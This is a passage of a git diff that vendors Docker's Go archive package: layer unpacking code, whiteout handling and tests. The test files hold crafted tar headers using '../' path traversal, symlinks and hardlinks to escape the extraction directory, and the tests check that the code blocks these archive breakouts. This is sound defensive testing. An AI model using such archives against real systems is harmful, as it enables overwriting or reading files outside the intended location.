b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go new file mode 100644 index 0000000000..2b775b45c4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go @@ -0,0 +1,9 @@ +package archive + +import ( + "path/filepath" +) + +func normalizePath(path string) string { + return filepath.FromSlash(path) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/diff.go b/vendor/github.com/docker/docker/pkg/archive/diff.go new file mode 100644 index 0000000000..9e1a58c499 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/diff.go @@ -0,0 +1,279 @@ +package archive + +import ( + "archive/tar" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/system" +) + +// UnpackLayer unpack `layer` to a `dest`. The stream `layer` can be +// compressed or uncompressed. +// Returns the size in bytes of the contents of the layer. +func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64, err error) { + tr := tar.NewReader(layer) + trBuf := pools.BufioReader32KPool.Get(tr) + defer pools.BufioReader32KPool.Put(trBuf) + + var dirs []*tar.Header + unpackedPaths := make(map[string]struct{}) + + if options == nil { + options = &TarOptions{} + } + if options.ExcludePatterns == nil { + options.ExcludePatterns = []string{} + } + remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) + if err != nil { + return 0, err + } + + aufsTempdir := "" + aufsHardlinks := make(map[string]*tar.Header) + + if options == nil { + options = &TarOptions{} + } + // Iterate through the files in the archive. + for { + hdr, err := tr.Next() + if err == io.EOF { + // end of tar archive + break + } + if err != nil { + return 0, err + } + + size += hdr.Size + + // Normalize name, for safety and for a simple is-root check + hdr.Name = filepath.Clean(hdr.Name) + + // Windows does not support filenames with colons in them. Ignore + // these files. This is not a problem though (although it might + // appear that it is). Let's suppose a client is running docker pull. + // The daemon it points to is Windows. Would it make sense for the + // client to be doing a docker pull Ubuntu for example (which has files + // with colons in the name under /usr/share/man/man3)? No, absolutely + // not as it would really only make sense that they were pulling a + // Windows image. However, for development, it is necessary to be able + // to pull Linux images which are in the repository. + // + // TODO Windows. Once the registry is aware of what images are Windows- + // specific or Linux-specific, this warning should be changed to an error + // to cater for the situation where someone does manage to upload a Linux + // image but have it tagged as Windows inadvertently. + if runtime.GOOS == "windows" { + if strings.Contains(hdr.Name, ":") { + logrus.Warnf("Windows: Ignoring %s (is this a Linux image?)", hdr.Name) + continue + } + } + + // Note as these operations are platform specific, so must the slash be. + if !strings.HasSuffix(hdr.Name, string(os.PathSeparator)) { + // Not the root directory, ensure that the parent directory exists. + // This happened in some tests where an image had a tarfile without any + // parent directories. + parent := filepath.Dir(hdr.Name) + parentPath := filepath.Join(dest, parent) + + if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) { + err = system.MkdirAll(parentPath, 0600) + if err != nil { + return 0, err + } + } + } + + // Skip AUFS metadata dirs + if strings.HasPrefix(hdr.Name, WhiteoutMetaPrefix) { + // Regular files inside /.wh..wh.plnk can be used as hardlink targets + // We don't want this directory, but we need the files in them so that + // such hardlinks can be resolved. + if strings.HasPrefix(hdr.Name, WhiteoutLinkDir) && hdr.Typeflag == tar.TypeReg { + basename := filepath.Base(hdr.Name) + aufsHardlinks[basename] = hdr + if aufsTempdir == "" { + if aufsTempdir, err = ioutil.TempDir("", "dockerplnk"); err != nil { + return 0, err + } + defer os.RemoveAll(aufsTempdir) + } + if err := createTarFile(filepath.Join(aufsTempdir, basename), dest, hdr, tr, true, nil, options.InUserNS); err != nil { + return 0, err + } + } + + if hdr.Name != WhiteoutOpaqueDir { + continue + } + } + path := filepath.Join(dest, hdr.Name) + rel, err := filepath.Rel(dest, path) + if err != nil { + return 0, err + } + + // Note as these operations are platform specific, so must the slash be. + if strings.HasPrefix(rel, ".."+string(os.PathSeparator)) { + return 0, breakoutError(fmt.Errorf("%q is outside of %q", hdr.Name, dest)) + } + base := filepath.Base(path) + + if strings.HasPrefix(base, WhiteoutPrefix) { + dir := filepath.Dir(path) + if base == WhiteoutOpaqueDir { + _, err := os.Lstat(dir) + if err != nil { + return 0, err + } + err = filepath.Walk(dir, func(path string, info os.FileInfo, err error) error { + if err != nil { + if os.IsNotExist(err) { + err = nil // parent was deleted + } + return err + } + if path == dir { + return nil + } + if _, exists := unpackedPaths[path]; !exists { + err := os.RemoveAll(path) + return err + } + return nil + }) + if err != nil { + return 0, err + } + } else { + originalBase := base[len(WhiteoutPrefix):] + originalPath := filepath.Join(dir, originalBase) + if err := os.RemoveAll(originalPath); err != nil { + return 0, err + } + } + } else { + // If path exits we almost always just want to remove and replace it. + // The only exception is when it is a directory *and* the file from + // the layer is also a directory. Then we want to merge them (i.e. + // just apply the metadata from the layer). + if fi, err := os.Lstat(path); err == nil { + if !(fi.IsDir() && hdr.Typeflag == tar.TypeDir) { + if err := os.RemoveAll(path); err != nil { + return 0, err + } + } + } + + trBuf.Reset(tr) + srcData := io.Reader(trBuf) + srcHdr := hdr + + // Hard links into /.wh..wh.plnk don't work, as we don't extract that directory, so + // we manually retarget these into the temporary files we extracted them into + if hdr.Typeflag == tar.TypeLink && strings.HasPrefix(filepath.Clean(hdr.Linkname), WhiteoutLinkDir) { + linkBasename := filepath.Base(hdr.Linkname) + srcHdr = aufsHardlinks[linkBasename] + if srcHdr == nil { + return 0, fmt.Errorf("Invalid aufs hardlink") + } + tmpFile, err := os.Open(filepath.Join(aufsTempdir, linkBasename)) + if err != nil { + return 0, err + } + defer tmpFile.Close() + srcData = tmpFile + } + + // if the options contain a uid & gid maps, convert header uid/gid + // entries using the maps such that lchown sets the proper mapped + // uid/gid after writing the file. We only perform this mapping if + // the file isn't already owned by the remapped root UID or GID, as + // that specific uid/gid has no mapping from container -> host, and + // those files already have the proper ownership for inside the + // container. + if srcHdr.Uid != remappedRootUID { + xUID, err := idtools.ToHost(srcHdr.Uid, options.UIDMaps) + if err != nil { + return 0, err + } + srcHdr.Uid = xUID + } + if srcHdr.Gid != remappedRootGID { + xGID, err := idtools.ToHost(srcHdr.Gid, options.GIDMaps) + if err != nil { + return 0, err + } + srcHdr.Gid = xGID + } + if err := createTarFile(path, dest, srcHdr, srcData, true, nil, options.InUserNS); err != nil { + return 0, err + } + + // Directory mtimes must be handled at the end to avoid further + // file creation in them to modify the directory mtime + if hdr.Typeflag == tar.TypeDir { + dirs = append(dirs, hdr) + } + unpackedPaths[path] = struct{}{} + } + } + + for _, hdr := range dirs { + path := filepath.Join(dest, hdr.Name) + if err := system.Chtimes(path, hdr.AccessTime, hdr.ModTime); err != nil { + return 0, err + } + } + + return size, nil +} + +// ApplyLayer parses a diff in the standard layer format from `layer`, +// and applies it to the directory `dest`. The stream `layer` can be +// compressed or uncompressed. +// Returns the size in bytes of the contents of the layer. +func ApplyLayer(dest string, layer io.Reader) (int64, error) { + return applyLayerHandler(dest, layer, &TarOptions{}, true) +} + +// ApplyUncompressedLayer parses a diff in the standard layer format from +// `layer`, and applies it to the directory `dest`. The stream `layer` +// can only be uncompressed. +// Returns the size in bytes of the contents of the layer. +func ApplyUncompressedLayer(dest string, layer io.Reader, options *TarOptions) (int64, error) { + return applyLayerHandler(dest, layer, options, false) +} + +// do the bulk load of ApplyLayer, but allow for not calling DecompressStream +func applyLayerHandler(dest string, layer io.Reader, options *TarOptions, decompress bool) (int64, error) { + dest = filepath.Clean(dest) + + // We need to be able to set any perms + oldmask, err := system.Umask(0) + if err != nil { + return 0, err + } + defer system.Umask(oldmask) // ignore err, ErrNotSupportedPlatform + + if decompress { + layer, err = DecompressStream(layer) + if err != nil { + return 0, err + } + } + return UnpackLayer(dest, layer, options) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/diff_test.go b/vendor/github.com/docker/docker/pkg/archive/diff_test.go new file mode 100644 index 0000000000..8167941ac0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/diff_test.go @@ -0,0 +1,386 @@ +package archive + +import ( + "archive/tar" + "io" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "runtime" + "testing" + + "github.com/docker/docker/pkg/ioutils" +) + +func TestApplyLayerInvalidFilenames(t *testing.T) { + // TODO Windows: Figure out how to fix this test. + if runtime.GOOS == "windows" { + t.Skip("Passes but hits breakoutError: platform and architecture is not supported") + } + for i, headers := range [][]*tar.Header{ + { + { + Name: "../victim/dotdot", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { + { + // Note the leading slash + Name: "/../victim/slash-dotdot", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("applylayer", "docker-TestApplyLayerInvalidFilenames", headers); err != nil { + t.Fatalf("i=%d. %v", i, err) + } + } +} + +func TestApplyLayerInvalidHardlink(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("TypeLink support on Windows") + } + for i, headers := range [][]*tar.Header{ + { // try reading victim/hello (../) + { + Name: "dotdot", + Typeflag: tar.TypeLink, + Linkname: "../victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (/../) + { + Name: "slash-dotdot", + Typeflag: tar.TypeLink, + // Note the leading slash + Linkname: "/../victim/hello", + Mode: 0644, + }, + }, + { // try writing victim/file + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim/file", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { // try reading victim/hello (hardlink, symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // Try reading victim/hello (hardlink, hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "hardlink", + Typeflag: tar.TypeLink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // Try removing victim directory (hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("applylayer", "docker-TestApplyLayerInvalidHardlink", headers); err != nil { + t.Fatalf("i=%d. %v", i, err) + } + } +} + +func TestApplyLayerInvalidSymlink(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("TypeSymLink support on Windows") + } + for i, headers := range [][]*tar.Header{ + { // try reading victim/hello (../) + { + Name: "dotdot", + Typeflag: tar.TypeSymlink, + Linkname: "../victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (/../) + { + Name: "slash-dotdot", + Typeflag: tar.TypeSymlink, + // Note the leading slash + Linkname: "/../victim/hello", + Mode: 0644, + }, + }, + { // try writing victim/file + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim/file", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { // try reading victim/hello (symlink, symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (symlink, hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "hardlink", + Typeflag: tar.TypeLink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // try removing victim directory (symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("applylayer", "docker-TestApplyLayerInvalidSymlink", headers); err != nil { + t.Fatalf("i=%d. %v", i, err) + } + } +} + +func TestApplyLayerWhiteouts(t *testing.T) { + // TODO Windows: Figure out why this test fails + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + + wd, err := ioutil.TempDir("", "graphdriver-test-whiteouts") + if err != nil { + return + } + defer os.RemoveAll(wd) + + base := []string{ + ".baz", + "bar/", + "bar/bax", + "bar/bay/", + "baz", + "foo/", + "foo/.abc", + "foo/.bcd/", + "foo/.bcd/a", + "foo/cde/", + "foo/cde/def", + "foo/cde/efg", + "foo/fgh", + "foobar", + } + + type tcase struct { + change, expected []string + } + + tcases := []tcase{ + { + base, + base, + }, + { + []string{ + ".bay", + ".wh.baz", + "foo/", + "foo/.bce", + "foo/.wh..wh..opq", + "foo/cde/", + "foo/cde/efg", + }, + []string{ + ".bay", + ".baz", + "bar/", + "bar/bax", + "bar/bay/", + "foo/", + "foo/.bce", + "foo/cde/", + "foo/cde/efg", + "foobar", + }, + }, + { + []string{ + ".bay", + ".wh..baz", + ".wh.foobar", + "foo/", + "foo/.abc", + "foo/.wh.cde", + "bar/", + }, + []string{ + ".bay", + "bar/", + "bar/bax", + "bar/bay/", + "foo/", + "foo/.abc", + "foo/.bce", + }, + }, + { + []string{ + ".abc", + ".wh..wh..opq", + "foobar", + }, + []string{ + ".abc", + "foobar", + }, + }, + } + + for i, tc := range tcases { + l, err := makeTestLayer(tc.change) + if err != nil { + t.Fatal(err) + } + + _, err = UnpackLayer(wd, l, nil) + if err != nil { + t.Fatal(err) + } + err = l.Close() + if err != nil { + t.Fatal(err) + } + + paths, err := readDirContents(wd) + if err != nil { + t.Fatal(err) + } + + if !reflect.DeepEqual(tc.expected, paths) { + t.Fatalf("invalid files for layer %d: expected %q, got %q", i, tc.expected, paths) + } + } + +} + +func makeTestLayer(paths []string) (rc io.ReadCloser, err error) { + tmpDir, err := ioutil.TempDir("", "graphdriver-test-mklayer") + if err != nil { + return + } + defer func() { + if err != nil { + os.RemoveAll(tmpDir) + } + }() + for _, p := range paths { + if p[len(p)-1] == filepath.Separator { + if err = os.MkdirAll(filepath.Join(tmpDir, p), 0700); err != nil { + return + } + } else { + if err = ioutil.WriteFile(filepath.Join(tmpDir, p), nil, 0600); err != nil { + return + } + } + } + archive, err := Tar(tmpDir, Uncompressed) + if err != nil { + return + } + return ioutils.NewReadCloserWrapper(archive, func() error { + err := archive.Close() + os.RemoveAll(tmpDir) + return err + }), nil +} + +func readDirContents(root string) ([]string, error) { + var files []string + err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error { + if err != nil { + return err + } + if path == root { + return nil + } + rel, err := filepath.Rel(root, path) + if err != nil { + return err + } + if info.IsDir() { + rel = rel + "/" + } + files = append(files, rel) + return nil + }) + if err != nil { + return nil, err + } + return files, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/example_changes.go b/vendor/github.com/docker/docker/pkg/archive/example_changes.go new file mode 100644 index 0000000000..cedd46a408 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/example_changes.go @@ -0,0 +1,97 @@ +// +build ignore + +// Simple tool to create an archive stream from an old and new directory +// +// By default it will stream the comparison of two temporary directories with junk files +package main + +import ( + "flag" + "fmt" + "io" + "io/ioutil" + "os" + "path" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/archive" +) + +var ( + flDebug = flag.Bool("D", false, "debugging output") + flNewDir = flag.String("newdir", "", "") + flOldDir = flag.String("olddir", "", "") + log = logrus.New() +) + +func main() { + flag.Usage = func() { + fmt.Println("Produce a tar from comparing two directory paths. By default a demo tar is created of around 200 files (including hardlinks)") + fmt.Printf("%s [OPTIONS]\n", os.Args[0]) + flag.PrintDefaults() + } + flag.Parse() + log.Out = os.Stderr + if (len(os.Getenv("DEBUG")) > 0) || *flDebug { + logrus.SetLevel(logrus.DebugLevel) + } + var newDir, oldDir string + + if len(*flNewDir) == 0 { + var err error + newDir, err = ioutil.TempDir("", "docker-test-newDir") + if err != nil { + log.Fatal(err) + } + defer os.RemoveAll(newDir) + if _, err := prepareUntarSourceDirectory(100, newDir, true); err != nil { + log.Fatal(err) + } + } else { + newDir = *flNewDir + } + + if len(*flOldDir) == 0 { + oldDir, err := ioutil.TempDir("", "docker-test-oldDir") + if err != nil { + log.Fatal(err) + } + defer os.RemoveAll(oldDir) + } else { + oldDir = *flOldDir + } + + changes, err := archive.ChangesDirs(newDir, oldDir) + if err != nil { + log.Fatal(err) + } + + a, err := archive.ExportChanges(newDir, changes) + if err != nil { + log.Fatal(err) + } + defer a.Close() + + i, err := io.Copy(os.Stdout, a) + if err != nil && err != io.EOF { + log.Fatal(err) + } + fmt.Fprintf(os.Stderr, "wrote archive of %d bytes", i) +} + +func prepareUntarSourceDirectory(numberOfFiles int, targetPath string, makeLinks bool) (int, error) { + fileData := []byte("fooo") + for n := 0; n < numberOfFiles; n++ { + fileName := fmt.Sprintf("file-%d", n) + if err := ioutil.WriteFile(path.Join(targetPath, fileName), fileData, 0700); err != nil { + return 0, err + } + if makeLinks { + if err := os.Link(path.Join(targetPath, fileName), path.Join(targetPath, fileName+"-link")); err != nil { + return 0, err + } + } + } + totalSize := numberOfFiles * len(fileData) + return totalSize, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/testdata/broken.tar b/vendor/github.com/docker/docker/pkg/archive/testdata/broken.tar new file mode 100644 index 0000000000000000000000000000000000000000..8f10ea6b87d3eb4fed572349dfe87695603b10a5 GIT binary patch literal 13824 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 literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/pkg/archive/time_linux.go b/vendor/github.com/docker/docker/pkg/archive/time_linux.go new file mode 100644 index 0000000000..3448569b1e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/time_linux.go @@ -0,0 +1,16 @@ +package archive + +import ( + "syscall" + "time" +) + +func timeToTimespec(time time.Time) (ts syscall.Timespec) { + if time.IsZero() { + // Return UTIME_OMIT special value + ts.Sec = 0 + ts.Nsec = ((1 << 30) - 2) + return + } + return syscall.NsecToTimespec(time.UnixNano()) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go new file mode 100644 index 0000000000..e85aac0540 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go @@ -0,0 +1,16 @@ +// +build !linux + +package archive + +import ( + "syscall" + "time" +) + +func timeToTimespec(time time.Time) (ts syscall.Timespec) { + nsec := int64(0) + if !time.IsZero() { + nsec = time.UnixNano() + } + return syscall.NsecToTimespec(nsec) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/utils_test.go b/vendor/github.com/docker/docker/pkg/archive/utils_test.go new file mode 100644 index 0000000000..01b9e92d1c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/utils_test.go @@ -0,0 +1,166 @@ +package archive + +import ( + "archive/tar" + "bytes" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "time" +) + +var testUntarFns = map[string]func(string, io.Reader) error{ + "untar": func(dest string, r io.Reader) error { + return Untar(r, dest, nil) + }, + "applylayer": func(dest string, r io.Reader) error { + _, err := ApplyLayer(dest, r) + return err + }, +} + +// testBreakout is a helper function that, within the provided `tmpdir` directory, +// creates a `victim` folder with a generated `hello` file in it. +// `untar` extracts to a directory named `dest`, the tar file created from `headers`. +// +// Here are the tested scenarios: +// - removed `victim` folder (write) +// - removed files from `victim` folder (write) +// - new files in `victim` folder (write) +// - modified files in `victim` folder (write) +// - file in `dest` with same content as `victim/hello` (read) +// +// When using testBreakout make sure you cover one of the scenarios listed above. +func testBreakout(untarFn string, tmpdir string, headers []*tar.Header) error { + tmpdir, err := ioutil.TempDir("", tmpdir) + if err != nil { + return err + } + defer os.RemoveAll(tmpdir) + + dest := filepath.Join(tmpdir, "dest") + if err := os.Mkdir(dest, 0755); err != nil { + return err + } + + victim := filepath.Join(tmpdir, "victim") + if err := os.Mkdir(victim, 0755); err != nil { + return err + } + hello := filepath.Join(victim, "hello") + helloData, err := time.Now().MarshalText() + if err != nil { + return err + } + if err := ioutil.WriteFile(hello, helloData, 0644); err != nil { + return err + } + helloStat, err := os.Stat(hello) + if err != nil { + return err + } + + reader, writer := io.Pipe() + go func() { + t := tar.NewWriter(writer) + for _, hdr := range headers { + t.WriteHeader(hdr) + } + t.Close() + }() + + untar := testUntarFns[untarFn] + if untar == nil { + return fmt.Errorf("could not find untar function %q in testUntarFns", untarFn) + } + if err := untar(dest, reader); err != nil { + if _, ok := err.(breakoutError); !ok { + // If untar returns an error unrelated to an archive breakout, + // then consider this an unexpected error and abort. + return err + } + // Here, untar detected the breakout. + // Let's move on verifying that indeed there was no breakout. + fmt.Printf("breakoutError: %v\n", err) + } + + // Check victim folder + f, err := os.Open(victim) + if err != nil { + // codepath taken if victim folder was removed + return fmt.Errorf("archive breakout: error reading %q: %v", victim, err) + } + defer f.Close() + + // Check contents of victim folder + // + // We are only interested in getting 2 files from the victim folder, because if all is well + // we expect only one result, the `hello` file. If there is a second result, it cannot + // hold the same name `hello` and we assume that a new file got created in the victim folder. + // That is enough to detect an archive breakout. + names, err := f.Readdirnames(2) + if err != nil { + // codepath taken if victim is not a folder + return fmt.Errorf("archive breakout: error reading directory content of %q: %v", victim, err) + } + for _, name := range names { + if name != "hello" { + // codepath taken if new file was created in victim folder + return fmt.Errorf("archive breakout: new file %q", name) + } + } + + // Check victim/hello + f, err = os.Open(hello) + if err != nil { + // codepath taken if read permissions were removed + return fmt.Errorf("archive breakout: could not lstat %q: %v", hello, err) + } + defer f.Close() + b, err := ioutil.ReadAll(f) + if err != nil { + return err + } + fi, err := f.Stat() + if err != nil { + return err + } + if helloStat.IsDir() != fi.IsDir() || + // TODO: cannot check for fi.ModTime() change + helloStat.Mode() != fi.Mode() || + helloStat.Size() != fi.Size() || + !bytes.Equal(helloData, b) { + // codepath taken if hello has been modified + return fmt.Errorf("archive breakout: file %q has been modified. Contents: expected=%q, got=%q. FileInfo: expected=%#v, got=%#v", hello, helloData, b, helloStat, fi) + } + + // Check that nothing in dest/ has the same content as victim/hello. + // Since victim/hello was generated with time.Now(), it is safe to assume + // that any file whose content matches exactly victim/hello, managed somehow + // to access victim/hello. + return filepath.Walk(dest, func(path string, info os.FileInfo, err error) error { + if info.IsDir() { + if err != nil { + // skip directory if error + return filepath.SkipDir + } + // enter directory + return nil + } + if err != nil { + // skip file if error + return nil + } + b, err := ioutil.ReadFile(path) + if err != nil { + // Houston, we have a problem. Aborting (space)walk. + return err + } + if bytes.Equal(helloData, b) { + return fmt.Errorf("archive breakout: file %q has been accessed via %q", hello, path) + } + return nil + }) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/whiteouts.go b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go new file mode 100644 index 0000000000..d20478a10d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go @@ -0,0 +1,23 @@ +package archive + +// Whiteouts are files with a special meaning for the layered filesystem. +// Docker uses AUFS whiteout files inside exported archives. In other +// filesystems these files are generated/handled on tar creation/extraction. + +// WhiteoutPrefix prefix means file is a whiteout. If this is followed by a +// filename this means that file has been removed from the base layer. +const WhiteoutPrefix = ".wh." + +// WhiteoutMetaPrefix prefix means whiteout has a special meaning and is not +// for removing an actual file. Normally these files are excluded from exported +// archives. +const WhiteoutMetaPrefix = WhiteoutPrefix + WhiteoutPrefix + +// WhiteoutLinkDir is a directory AUFS uses for storing hardlink links to other +// layers. Normally these should not go into exported archives and all changed +// hardlinks should be copied to the top layer. +const WhiteoutLinkDir = WhiteoutMetaPrefix + "plnk" + +// WhiteoutOpaqueDir file means directory has been made opaque - meaning +// readdir calls to this directory do not follow to lower layers. +const WhiteoutOpaqueDir = WhiteoutMetaPrefix + ".opq" diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap.go b/vendor/github.com/docker/docker/pkg/archive/wrap.go new file mode 100644 index 0000000000..b39d12c878 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/wrap.go @@ -0,0 +1,59 @@ +package archive + +import ( + "archive/tar" + "bytes" + "io" +) + +// Generate generates a new archive from the content provided +// as input. +// +// `files` is a sequence of path/content pairs. A new file is +// added to the archive for each pair. +// If the last pair is incomplete, the file is created with an +// empty content. For example: +// +// Generate("foo.txt", "hello world", "emptyfile") +// +// The above call will return an archive with 2 files: +// * ./foo.txt with content "hello world" +// * ./empty with empty content +// +// FIXME: stream content instead of buffering +// FIXME: specify permissions and other archive metadata +func Generate(input ...string) (io.Reader, error) { + files := parseStringPairs(input...) + buf := new(bytes.Buffer) + tw := tar.NewWriter(buf) + for _, file := range files { + name, content := file[0], file[1] + hdr := &tar.Header{ + Name: name, + Size: int64(len(content)), + } + if err := tw.WriteHeader(hdr); err != nil { + return nil, err + } + if _, err := tw.Write([]byte(content)); err != nil { + return nil, err + } + } + if err := tw.Close(); err != nil { + return nil, err + } + return buf, nil +} + +func parseStringPairs(input ...string) (output [][2]string) { + output = make([][2]string, 0, len(input)/2+1) + for i := 0; i < len(input); i += 2 { + var pair [2]string + pair[0] = input[i] + if i+1 < len(input) { + pair[1] = 